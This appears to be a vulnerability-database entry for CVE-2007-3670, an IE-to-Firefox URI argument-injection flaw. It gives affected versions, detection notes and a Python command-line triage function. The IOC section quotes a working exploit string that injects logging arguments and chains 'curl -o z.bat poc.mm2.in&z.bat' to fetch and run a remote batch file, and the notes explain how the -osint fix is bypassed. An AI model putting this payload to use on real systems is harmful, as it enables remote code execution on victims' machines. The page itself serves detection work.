CVE-2007-3670
published 2007-07-10

Priority: P426 · medium · 4.3 (CVSS 2.0)
Vector: AV:N/AC:M/Au:N/C:N/I:P/A:N
EXPLOIT
EPSS: 29.35% (97.9th percentile)

Argument injection vulnerability in Microsoft Internet Explorer, when running on systems with Firefox installed and certain URIs registered, allows remote attackers to conduct cross-browser scripting attacks and execute arbitrary commands via shell metacharacters in a (1) FirefoxURL or (2) FirefoxHTML URI, which are inserted into the command line that is created when invoking firefox.exe. NOTE: it has been debated as to whether the issue is in Internet Explorer or Firefox. As of 20070711, it is CVE's opinion that IE appears to be failing to properly delimit the URL argument when invoking Firefox, and this issue could arise with other protocol handlers in IE as well. However, Mozilla has stated that it will address the issue with a "defense in depth" fix that will "prevent IE from sending Firefox malicious data."

Affected

10 ranges
Vendor      Product             Version range   Fixed in
apple       quicktime           <= 7.1.5
microsoft   internet_explorer
microsoft   internet_explorer
microsoft   internet_explorer
mozilla     firefox             <= 2.0.0.4
mozilla     firefox             <= 2.0.0.6
mozilla     firefox
mozilla     firefox
mozilla     thunderbird
netscape    navigator

Detection & IOCs (extracted from sources)

command: FirefoxURL-308046B0AF4A39CB:" -P -MOZ_LOG=raw,Widget:4 -MOZ_LOG_FILE="C:/Users/IEUser/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/&cd ..&cd ..&cd Users&cd Public&curl -o z.bat poc.mm2.in&z.bat
domain: poc.mm2.in
path: C:/Users/IEUser/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/
filename: z.bat
other: firefoxurl-308046b0af4a39cb:
  • Monitor for process launches of firefox.exe or navigator.exe with suspicious arguments including '-chrome', '-MOZ_LOG', or '-MOZ_LOG_FILE' passed via URI handler invocation (firefoxurl: or navigatorurl: schemes).
  • Detect use of the '-chrome' argument passed to Firefox or Navigator via URI handler, which enables JavaScript execution in privileged Chrome context.
  • Alert on command lines containing '-MOZ_LOG' or '-MOZ_LOG_FILE' arguments passed to Firefox, especially when combined with shell metacharacters (& ; |) or paths pointing to Startup folders.
  • Detect spaces and double-quote characters in URIs passed to external program handlers (mailto:, firefoxurl:, navigatorurl:), which are the injection vector for argument smuggling.
  • Monitor for files written to the Windows Startup folder (e.g. %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\) by Firefox or child processes spawned from Firefox.
  • Detect cmd.exe being instantiated via Mozilla XPCOM interfaces (nsILocalFile / nsIProcess) from within a browser JavaScript context, as used in the navigatorurl PoC exploit.
  • The -osint flag was introduced as a fix for CVE-2007-3670 in nsAppRunner.cpp, but the -MOZ_LOG and -MOZ_LOG_FILE arguments bypass this check because they are handled in LogCommandLineHandler.cpp without the -osint guard, causing the vulnerability to resurface in later Firefox versions.
  • Major browsers (Chrome, Firefox itself) encode special characters in URLs (e.g. " becomes %22) before passing to URI handlers, preventing exploitation. However, Windows applications such as Microsoft Office do not perform this encoding, making them viable attack vectors.
  • The exploit payload requires knowledge of the victim's Windows username to construct the correct Startup folder path; in many organizations the username matches the email address prefix, enabling targeted attacks via email delivery.
  • Red Hat Enterprise Linux versions of Firefox and Thunderbird are not affected by CVE-2007-3670 or its related variants (CVE-2007-4038, CVE-2007-4039).
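
The command-line checks from the detection notes above, written as a triage function over process-creation records. This is an added example, not code from the sources this page summarises; the function names, reason tags and sample records are constructed for illustration.

```python
import re

# Image names and argument names come from the detection notes above.
BROWSER_IMAGES = {"firefox.exe", "navigator.exe"}
RISKY_ARGS = ("-chrome", "-moz_log", "-moz_log_file")
HANDLER_URI = re.compile(r"\b(?:firefoxurl|navigatorurl)[-\w]*:", re.I)
SHELL_META = re.compile(r"[&;|]")
STARTUP_DIR = re.compile(r"start menu[\\/]programs[\\/]startup", re.I)


def has_arg(command_line, arg):
    """True if `arg` starts a token and is followed by space, '=', quote or end."""
    pattern = r'(?:^|[\s"])' + re.escape(arg) + r'(?=[\s="]|$)'
    return re.search(pattern, command_line, re.I) is not None


def flag_command_line(image, command_line):
    """Return the reasons a browser launch matches the notes above ([] if none)."""
    name = image.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if name not in BROWSER_IMAGES:
        return []
    reasons = ["arg:" + a for a in RISKY_ARGS if has_arg(command_line, a)]
    if not reasons:
        return []
    if HANDLER_URI.search(command_line):
        reasons.append("uri-handler")
    # '&' is normal in ordinary URLs, so metacharacters and Startup paths only
    # count once a logging argument is already present.
    if any(r.startswith("arg:-moz_log") for r in reasons):
        if SHELL_META.search(command_line):
            reasons.append("shell-metacharacter")
        if STARTUP_DIR.search(command_line):
            reasons.append("startup-folder-path")
    return reasons


# Constructed process-creation records (image, command line); not real telemetry.
FX = r"C:\Program Files\Mozilla Firefox\firefox.exe"
SAMPLES = [
    (FX, '"firefox.exe" -url "https://example.com/?a=1&b=2"'),
    (FX, '"firefox.exe" -url "firefoxurl:x" -chrome "constructed"'),
    (FX, '"firefox.exe" -url "firefoxurl:x" -MOZ_LOG_FILE="C:/Users/alice/AppData/'
         'Roaming/Microsoft/Windows/Start Menu/Programs/Startup/&echo constructed"'),
    (r"C:\Windows\System32\notepad.exe", "notepad.exe -MOZ_LOG=x"),
]

if __name__ == "__main__":
    for image, cmd in SAMPLES:
        print(flag_command_line(image, cmd) or "ok", "<-", cmd[:60])
```

The ordinary URL with `&` in its query string is not flagged; the escalating reasons are only attached when a logging argument is already on the command line.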

CVSS provenance

nvd             v2.0   4.3   MEDIUM   AV:N/AC:M/Au:N/C:N/I:P/A:N
vendor_redhat          5.0   MEDIUM
vendor_ubuntu          4.3   MEDIUM